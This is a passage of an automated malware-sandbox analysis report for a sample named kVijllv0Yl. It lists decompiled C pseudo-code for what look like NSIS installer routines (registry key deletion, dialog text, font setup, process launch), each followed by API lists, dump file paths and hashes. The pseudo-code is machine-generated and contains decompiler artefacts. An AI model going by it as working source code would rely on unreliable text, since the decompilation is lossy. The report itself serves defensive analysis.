                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: MessageSend$Windowlstrlen$CountCreateDestroyDialogParamTextTicklstrcatwsprintf
                  • String ID: ... %d%%
                  • API String ID: 632923820-2449383134
                  • Opcode ID: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                  • Instruction ID: 259a824e759da58d6bdbd9050b41674a690fb301749dacda7e517d53f8420425
                  • Opcode Fuzzy Hash: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                  • Instruction Fuzzy Hash: 29019270909224EBDB216F60EF4C99F7B78AB047017104137F801B12D1C6BCA986C6EE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 84%
                  			E00402A28(void* _a4, char* _a8, intOrPtr _a12) {
                  				void* _v8;
                  				char _v272;
                  				long _t18;
                  				intOrPtr* _t27;
                  				long _t28;
                  
                  				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423f50 | 0x00000008,  &_v8);
                  				if(_t18 == 0) {
                  					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                  						if(_a12 != 0) {
                  							RegCloseKey(_v8);
                  							L8:
                  							return 1;
                  						}
                  						if(E00402A28(_v8,  &_v272, 0) != 0) {
                  							break;
                  						}
                  					}
                  					RegCloseKey(_v8);
                  					_t27 = E00405DA3(2);
                  					if(_t27 == 0) {
                  						if( *0x423f50 != 0) {
                  							goto L8;
                  						}
                  						_t28 = RegDeleteKeyA(_a4, _a8);
                  						if(_t28 != 0) {
                  							goto L8;
                  						}
                  						return _t28;
                  					}
                  					return  *_t27(_a4, _a8,  *0x423f50, 0);
                  				}
                  				return _t18;
                  			}









                  APIs
                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A49
                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                  • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                  • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: Close$DeleteEnumOpen
                  • String ID:
                  • API String ID: 1912718029-0
                  • Opcode ID: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                  • Instruction ID: 7ac3799e0b9b7f286de12d9a89f233b53136cfd59643404f79253a10a0ceffad
                  • Opcode Fuzzy Hash: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                  • Instruction Fuzzy Hash: AA115931A00009FEDF21AF90DE48DAB3B79EB44395B104536BA05A01A0DB749E51AE69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00401CC1(int __edx) {
                  				void* _t17;
                  				struct HINSTANCE__* _t21;
                  				struct HWND__* _t25;
                  				void* _t27;
                  
                  				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
                  				GetClientRect(_t25, _t27 - 0x40);
                  				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
                  				if(_t17 != _t21) {
                  					DeleteObject(_t17);
                  				}
                  				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
                  				return 0;
                  			}








                  APIs
                  • GetDlgItem.USER32 ref: 00401CC5
                  • GetClientRect.USER32 ref: 00401CD2
                  • LoadImageA.USER32 ref: 00401CF3
                  • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                  • DeleteObject.GDI32(00000000), ref: 00401D10
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                  • String ID:
                  • API String ID: 1849352358-0
                  • Opcode ID: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                  • Instruction ID: ad5020e38ef11d08f371025551c7f23f007b957d45941c5b52acf933ea75ddf9
                  • Opcode Fuzzy Hash: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                  • Instruction Fuzzy Hash: 31F0F9B2A04105BFD700EBA4EE89DAFB7BDEB44341B104476F601F21A0C7789D018B29
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 51%
                  			E00404610(int _a4, intOrPtr _a8, unsigned int _a12) {
                  				char _v36;
                  				char _v68;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* _t26;
                  				void* _t34;
                  				signed int _t36;
                  				signed int _t39;
                  				unsigned int _t46;
                  
                  				_t46 = _a12;
                  				_push(0x14);
                  				_pop(0);
                  				_t34 = 0xffffffdc;
                  				if(_t46 < 0x100000) {
                  					_push(0xa);
                  					_pop(0);
                  					_t34 = 0xffffffdd;
                  				}
                  				if(_t46 < 0x400) {
                  					_t34 = 0xffffffde;
                  				}
                  				if(_t46 < 0xffff3333) {
                  					_t39 = 0x14;
                  					asm("cdq");
                  					_t46 = _t46 + 1 / _t39;
                  				}
                  				_push(E00405AA7(_t34, 0, _t46,  &_v36, 0xffffffdf));
                  				_push(E00405AA7(_t34, 0, _t46,  &_v68, _t34));
                  				_t21 = _t46 & 0x00ffffff;
                  				_t36 = 0xa;
                  				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                  				_push(_t46 >> 0);
                  				_t26 = E00405AA7(_t34, 0, 0x420498, 0x420498, _a8);
                  				wsprintfA(_t26 + lstrlenA(0x420498), "%u.%u%s%s");
                  				return SetDlgItemTextA( *0x423678, _a4, 0x420498);
                  			}














                  APIs
                  • lstrlenA.KERNEL32(00420498,00420498,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404530,000000DF,0000040F,00000400,00000000), ref: 0040469E
                  • wsprintfA.USER32 ref: 004046A6
                  • SetDlgItemTextA.USER32 ref: 004046B9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: ItemTextlstrlenwsprintf
                  • String ID: %u.%u%s%s
                  • API String ID: 3540041739-3551169577
                  • Opcode ID: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                  • Instruction ID: 4c66ffa9968b47036da968d2f23bae361eeba693da1d293f62fa9500f86314f5
                  • Opcode Fuzzy Hash: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                  • Instruction Fuzzy Hash: 6211E6737001243BDB10A5699C45EAF3299DBC2335F14423BF625F61D1E9798C1186A9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 51%
                  			E00401BAD() {
                  				signed int _t28;
                  				CHAR* _t31;
                  				long _t32;
                  				int _t37;
                  				signed int _t38;
                  				int _t42;
                  				int _t48;
                  				struct HWND__* _t52;
                  				void* _t55;
                  
                  				 *(_t55 - 0x34) = E004029CB(3);
                  				 *(_t55 + 8) = E004029CB(4);
                  				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
                  					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
                  				}
                  				__eflags =  *(_t55 - 0x10) & 0x00000002;
                  				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
                  					 *(_t55 + 8) = E004029E8(0x44);
                  				}
                  				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
                  				_push(1);
                  				if(__eflags != 0) {
                  					_t50 = E004029E8();
                  					_t28 = E004029E8();
                  					asm("sbb ecx, ecx");
                  					asm("sbb eax, eax");
                  					_t31 =  ~( *_t27) & _t50;
                  					__eflags = _t31;
                  					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                  					goto L10;
                  				} else {
                  					_t52 = E004029CB();
                  					_t37 = E004029CB();
                  					_t48 =  *(_t55 - 0x10) >> 2;
                  					if(__eflags == 0) {
                  						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
                  						L10:
                  						 *(_t55 - 8) = _t32;
                  					} else {
                  						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
                  						asm("sbb eax, eax");
                  						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                  					}
                  				}
                  				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
                  				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
                  					_push( *(_t55 - 8));
                  					E004059E3();
                  				}
                  				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
                  				return 0;
                  			}













                  APIs
                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: MessageSend$Timeout
                  • String ID: !
                  • API String ID: 1777923405-2657877971
                  • Opcode ID: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                  • Instruction ID: c520659e647c29be31daea63823ecf32d675036654070bdfdaec67237a792274
                  • Opcode Fuzzy Hash: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                  • Instruction Fuzzy Hash: 902183B1A44104BEDF01AFB5CE5BAAD7A75EF45704F14047AF501B61D1D6B88940D728
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004052E5(CHAR* _a4) {
                  				struct _PROCESS_INFORMATION _v20;
                  				int _t7;
                  
                  				0x4224a0->cb = 0x44;
                  				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a0,  &_v20);
                  				if(_t7 != 0) {
                  					CloseHandle(_v20.hThread);
                  					return _v20.hProcess;
                  				}
                  				return _t7;
                  			}






                  APIs
                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A0,Error launching installer), ref: 0040530A
                  • CloseHandle.KERNEL32(?), ref: 00405317
                  Strings
                  • Error launching installer, xrefs: 004052F8
                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004052E5
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: CloseCreateHandleProcess
                  • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                  • API String ID: 3712363035-4043152584
                  • Opcode ID: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                  • Instruction ID: 638c90c2c8bd3d8652662e5a24b63cb160f6dc818783434175b306b50d96cec4
                  • Opcode Fuzzy Hash: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                  • Instruction Fuzzy Hash: 32E0ECB4A00209BFDB00AF64ED09B6F7BBCFB04348F808522A911E2150D7B4E8148A69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00405578(CHAR* _a4) {
                  				CHAR* _t7;
                  
                  				_t7 = _a4;
                  				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                  					lstrcatA(_t7, 0x40900c);
                  				}
                  				return _t7;
                  			}





                  APIs
                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 0040557E
                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405587
                  • lstrcatA.KERNEL32(?,0040900C), ref: 00405598
                  Strings
                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405578
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: CharPrevlstrcatlstrlen
                  • String ID: C:\Users\user\AppData\Local\Temp\
                  • API String ID: 2659869361-3936084776
                  • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                  • Instruction ID: 4689f4cb8dc724d8b29f049f697397264ef60a28c46f00026a2de7c751f5ddbe
                  • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                  • Instruction Fuzzy Hash: 17D0A962609A307EE20222159C05ECB2A08CF42301B048022F500B62D2C33C4D418FFE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 85%
                  			E00401EC5(char __ebx, char* __edi, char* __esi) {
                  				char* _t18;
                  				int _t19;
                  				void* _t30;
                  
                  				_t18 = E004029E8(0xffffffee);
                  				 *(_t30 - 0x2c) = _t18;
                  				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
                  				 *__esi = __ebx;
                  				 *(_t30 - 8) = _t19;
                  				 *__edi = __ebx;
                  				 *((intOrPtr*)(_t30 - 4)) = 1;
                  				if(_t19 != __ebx) {
                  					__eax = GlobalAlloc(0x40, __eax);
                  					 *(__ebp + 8) = __eax;
                  					if(__eax != __ebx) {
                  						if(__eax != 0) {
                  							__ebp - 0x44 = __ebp - 0x34;
                  							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
                  								 *(__ebp - 0x34) = E004059E3(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
                  								 *(__ebp - 0x34) = E004059E3(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
                  								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                  							}
                  						}
                  						_push( *(__ebp + 8));
                  						GlobalFree();
                  					}
                  				}
                  				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
                  				return 0;
                  			}







                  APIs
                  • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                  • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                  • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                    • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                  • String ID:
                  • API String ID: 1404258612-0
                  • Opcode ID: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                  • Instruction ID: 32b4c4ba67c2d4aeec558e743cb191f9ba8cb92773df28d6a4a6bb64e08d8cf3
                  • Opcode Fuzzy Hash: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                  • Instruction Fuzzy Hash: 43111CB2900108BEDB01EFA5D945DAEBBB9EF04354B20807AF505F61E1D7789E54DB28
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 67%
                  			E00401D1B() {
                  				void* __esi;
                  				int _t6;
                  				signed char _t11;
                  				struct HFONT__* _t14;
                  				void* _t18;
                  				void* _t24;
                  				void* _t26;
                  				void* _t28;
                  
                  				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
                  				0x40af6c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
                  				 *0x40af7c = E004029CB(3);
                  				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                  				 *0x40af83 = 1;
                  				 *0x40af80 = _t11 & 0x00000001;
                  				 *0x40af81 = _t11 & 0x00000002;
                  				 *0x40af82 = _t11 & 0x00000004;
                  				E00405AA7(_t18, _t24, _t26, 0x40af88,  *((intOrPtr*)(_t28 - 0x20)));
                  				_t14 = CreateFontIndirectA(0x40af6c);
                  				_push(_t14);
                  				_push(_t26);
                  				E004059E3();
                  				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
                  				return 0;
                  			}












                  APIs
                  • GetDC.USER32(?), ref: 00401D22
                  • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                  • CreateFontIndirectA.GDI32(0040AF6C), ref: 00401D8A
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: CapsCreateDeviceFontIndirect
                  • String ID:
                  • API String ID: 3272661963-0
                  • Opcode ID: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                  • Instruction ID: 28934dfc7bc65fa7e96b773f26fd89147779a1e7d92ad1971070d574f64f8b8b
                  • Opcode Fuzzy Hash: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                  • Instruction Fuzzy Hash: 3AF0AFF0A48341AEE7009770AE1ABAA3B64A715305F104535F582BA1E2C6BC04159F3F
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00403897(void* __ecx, void* __eflags) {
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed short _t6;
                  				intOrPtr _t11;
                  				signed int _t13;
                  				signed int _t16;
                  				signed short* _t18;
                  				signed int _t20;
                  				signed short* _t23;
                  				intOrPtr _t25;
                  				signed int _t26;
                  				intOrPtr* _t27;
                  
                  				_t24 = "1033";
                  				_t13 = 0xffff;
                  				_t6 = E004059FC(__ecx, "1033");
                  				while(1) {
                  					_t26 =  *0x423ee4;
                  					if(_t26 == 0) {
                  						goto L7;
                  					}
                  					_t16 =  *( *0x423eb0 + 0x64);
                  					_t20 =  ~_t16;
                  					_t18 = _t16 * _t26 +  *0x423ee0;
                  					while(1) {
                  						_t18 = _t18 + _t20;
                  						_t26 = _t26 - 1;
                  						if((( *_t18 ^ _t6) & _t13) == 0) {
                  							break;
                  						}
                  						if(_t26 != 0) {
                  							continue;
                  						}
                  						goto L7;
                  					}
                  					 *0x423680 = _t18[1];
                  					 *0x423f48 = _t18[3];
                  					_t23 =  &(_t18[5]);
                  					if(_t23 != 0) {
                  						 *0x42367c = _t23;
                  						E004059E3(_t24,  *_t18 & 0x0000ffff);
                  						SetWindowTextA( *0x420470, E00405AA7(_t13, _t24, _t26, 0x4236a0, 0xfffffffe));
                  						_t11 =  *0x423ecc;
                  						_t27 =  *0x423ec8;
                  						if(_t11 == 0) {
                  							L15:
                  							return _t11;
                  						}
                  						_t25 = _t11;
                  						do {
                  							_t11 =  *_t27;
                  							if(_t11 != 0) {
                  								_t11 = E00405AA7(_t13, _t25, _t27, _t27 + 0x18, _t11);
                  							}
                  							_t27 = _t27 + 0x418;
                  							_t25 = _t25 - 1;
                  						} while (_t25 != 0);
                  						goto L15;
                  					}
                  					L7:
                  					if(_t13 != 0xffff) {
                  						_t13 = 0;
                  					} else {
                  						_t13 = 0x3ff;
                  					}
                  				}
                  			}

















                  APIs
                  • SetWindowTextA.USER32(00000000,004236A0), ref: 0040392F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: TextWindow
                  • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                  • API String ID: 530164218-3512041753
                  • Opcode ID: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                  • Instruction ID: 77a07bfd4d582853364bfe0cce575c4745298431d34a1254bec181f891eb0756
                  • Opcode Fuzzy Hash: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                  • Instruction Fuzzy Hash: 3611C271B005119BC334AF15D880A373BBDEF84726369827BE901A73A1C77E9E039A58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00404D73(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                  				long _t22;
                  
                  				if(_a8 != 0x102) {
                  					if(_a8 != 0x200) {
                  						_t22 = _a16;
                  						L7:
                  						if(_a8 == 0x419 &&  *0x420480 != _t22) {
                  							 *0x420480 = _t22;
                  							E00405A85(0x420498, 0x424000);
                  							E004059E3(0x424000, _t22);
                  							E0040140B(6);
                  							E00405A85(0x424000, 0x420498);
                  						}
                  						L11:
                  						return CallWindowProcA( *0x420488, _a4, _a8, _a12, _t22);
                  					}
                  					if(IsWindowVisible(_a4) == 0) {
                  						L10:
                  						_t22 = _a16;
                  						goto L11;
                  					}
                  					_t22 = E004046F2(_a4, 1);
                  					_a8 = 0x419;
                  					goto L7;
                  				}
                  				if(_a12 != 0x20) {
                  					goto L10;
                  				}
                  				E00403E83(0x413);
                  				return 0;
                  			}





                  APIs
                  • IsWindowVisible.USER32(?), ref: 00404DA9
                  • CallWindowProcA.USER32 ref: 00404E17
                    • Part of subcall function 00403E83: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E95
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
